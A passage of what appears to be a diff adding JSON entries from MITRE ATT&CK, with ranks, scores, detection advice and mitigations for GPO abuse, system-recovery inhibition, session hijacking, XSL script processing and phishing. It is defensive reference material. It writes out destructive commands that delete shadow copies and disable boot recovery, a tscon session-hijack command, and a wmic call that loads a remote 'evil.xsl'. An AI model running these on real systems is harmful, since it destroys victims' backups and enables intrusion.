privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ], + "subtechniques": [ + { + "tid": "T1484.001", + "name": "Domain Policy Modification: Group Policy Modification", + "description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path \\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\nMalicious GPO modifications can be used to implement many other malicious behaviors such as Scheduled Task/Job, Disable or Modify Tools, Ingress Tool Transfer, Create Account, Service Execution, and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\nFor example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious Scheduled Task/Job by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)", + "url": "https://attack.mitre.org/techniques/T1484/001", + "detection": "It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:\n
    \n
  • Event ID 5136 - A directory service object was modified
    • \n
  • Event ID 5137 - A directory service object was created
    • \n
  • Event ID 5138 - A directory service object was undeleted
    • \n
  • Event ID 5139 - A directory service object was moved
    • \n
  • Event ID 5141 - A directory service object was deleted
    • \n
\nGPO abuse will often be accompanied by some other behavior such as Scheduled Task/Job, which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1484.002", + "name": "Domain Policy Modification: Domain Trust Modification", + "description": "Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.\nManipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge SAML Tokens, without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate.", + "url": "https://attack.mitre.org/techniques/T1484/002", + "detection": "Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)\nMonitor for PowerShell commands such as: Update-MSOLFederatedDomain –DomainName: \"Federated Domain Name\", or Update-MSOLFederatedDomain –DomainName: \"Federated Domain Name\" –supportmultipledomain.(Citation: Microsoft - Update or Repair Federated domain)", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + } + ] + }, + { + "rank": 55, + "tid": "T1495", + "name": "Firmware Corruption", + "description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.", + "url": "https://attack.mitre.org/techniques/T1495", + "detection": "System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.", + "score": 0.9736619047619046, + "network_score": 0.2, + "file_score": 0.2, + "hardware_score": 0.2, + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "subtechniques": [] + }, + { + "rank": 56, + "tid": "T1490", + "name": "Inhibit System Recovery", + "description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of Data Destruction and Data Encrypted for Impact.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n
    \n
  • vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet
    • \n
  • Windows Management Instrumentation can be used to delete volume shadow copies - wmic shadowcopy delete
    • \n
  • wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet
    • \n
  • bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
    • \n
", + "url": "https://attack.mitre.org/techniques/T1490", + "detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.\nMonitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\PreviousVersions\\DisableLocalPage).", + "score": 0.9660842142857142, + "network_score": 0.2, + "hardware_score": 0.2, + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1053", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ], + "subtechniques": [] + }, + { + "rank": 57, + "tid": "T1571", + "name": "Non-Standard Port", + "description": "Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.", + "url": "https://attack.mitre.org/techniques/T1571", + "detection": "Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2)", + "score": 0.9659059482628571, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "subtechniques": [] + }, + { + "rank": 58, + "tid": "T1563", + "name": "Remote Service Session Hijacking", + "description": "Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.\nAdversaries may commandeer these sessions to carry out actions on remote systems. Remote Service Session Hijacking differs from use of Remote Services because it hijacks an existing session rather than creating a new session using Valid Accounts.(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)", + "url": "https://attack.mitre.org/techniques/T1563", + "detection": "Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\nMonitor for processes and command-line arguments associated with hijacking service sessions.", + "score": 0.9479105557971428, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ], + "subtechniques": [ + { + "tid": "T1563.001", + "name": "Remote Service Session Hijacking: SSH Hijacking", + "description": "Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.\nIn order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)\nSSH Hijacking differs from use of SSH because it hijacks an existing SSH session rather than creating a new session using Valid Accounts.", + "url": "https://attack.mitre.org/techniques/T1563/001", + "detection": "Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1563.002", + "name": "Remote Service Session Hijacking: RDP Hijacking", + "description": "Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)\nAdversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, c:\\windows\\system32\\tscon.exe [session number to be stolen], an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to Remote System Discovery and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)", + "url": "https://attack.mitre.org/techniques/T1563/002", + "detection": "Consider monitoring processes for tscon.exe usage and monitor service creation that uses cmd.exe /k or cmd.exe /c in its arguments to detect RDP session hijacking.\nUse of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + } + ] + }, + { + "rank": 59, + "tid": "T1489", + "name": "Service Stop", + "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)", + "url": "https://attack.mitre.org/techniques/T1489", + "detection": "Monitor processes and command-line arguments to see if critical processes are terminated or stop running.\nMonitor for edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to services that do not correlate with known software, patch cycles, etc. Windows service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Systemd service unit files are stored within the /etc/systemd/system, /usr/lib/systemd/system/, and /home/.config/systemd/user/ directories, as well as associated symbolic links.\nAlterations to the service binary path or the service startup type changed to disabled may be suspicious.\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)", + "score": 0.9167605514285713, + "network_score": 0.2, + "hardware_score": 0.2, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + } + ], + "subtechniques": [] + }, + { + "rank": 60, + "tid": "T1539", + "name": "Steal Web Session Cookie", + "description": "An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)\nThere are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a malicious proxy (ex: Adversary-in-the-Middle) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)\nAfter an adversary acquires a valid cookie, they can then perform a Web Session Cookie technique to login to the corresponding web application.", + "url": "https://attack.mitre.org/techniques/T1539", + "detection": "Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.", + "score": 0.9162809523809523, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ], + "subtechniques": [] + }, + { + "rank": 61, + "tid": "T1220", + "name": "XSL Script Processing", + "description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to Trusted Developer Utilities Proxy Execution, the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)\nCommand-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)\n
    \n
  • msxsl.exe customers[.]xml script[.]xsl
    • \n
  • msxsl.exe script[.]xsl script[.]xsl
    • \n
  • msxsl.exe script[.]jpeg script[.]jpeg
    • \n
\nAnother variation of this technique, dubbed “Squiblytwo”, involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its Regsvr32/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)\nCommand-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)\n
    \n
  • Local File: wmic process list /FORMAT:evil[.]xsl
    • \n
  • Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
    • \n
", + "url": "https://attack.mitre.org/techniques/T1220", + "detection": "Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.\nThe presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.", + "score": 0.9158207162476191, + "process_score": 0.2, + "file_score": 0.2, + "cloud_score": 0.2, + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ], + "subtechniques": [] + }, + { + "rank": 62, + "tid": "T1537", + "name": "Transfer Data to Cloud Account", + "description": "Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.\nA defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.\nIncidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) ", + "url": "https://attack.mitre.org/techniques/T1537", + "detection": "Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. ", + "score": 0.9134285714285713, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ], + "subtechniques": [] + }, + { + "rank": 63, + "tid": "T1566", + "name": "Phishing", + "description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source.", + "url": "https://attack.mitre.org/techniques/T1566", + "detection": "Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\nURL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\nBecause most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once User Execution occurs.", + "score": 0.9075467228752381, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ], + "subtechniques": [ + { + "tid": "T1566.001", + "name": "Phishing: Spearphishing Attachment", + "description": "Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. ", + "url": "https://attack.mitre.org/techniques/T1566/001", + "detection": "Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as Exploitation for Client Execution or usage of malicious scripts.\nMonitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL)", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + }, + { + "tid": "T1566.002", + "name": "Phishing: Spearphishing Link", + "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\nAll forms of spearphishing are electronically delivered social engineering targeted at a 